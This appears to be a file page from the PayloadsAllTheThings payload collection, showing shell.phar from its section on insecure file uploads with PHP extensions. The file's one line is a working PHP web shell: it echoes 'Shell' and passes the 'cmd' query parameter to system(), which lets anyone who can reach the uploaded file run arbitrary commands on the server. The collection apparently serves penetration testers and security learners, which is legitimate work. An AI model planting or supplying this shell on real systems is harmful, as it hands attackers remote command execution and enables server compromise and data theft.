PayloadsAllTheThings/Upload insecure files/Extension PHP/shell.phar
2019-02-15 16:00:50 +01:00

1 line
43 B
Plaintext

<?php echo "Shell";system($_GET['cmd']); ?>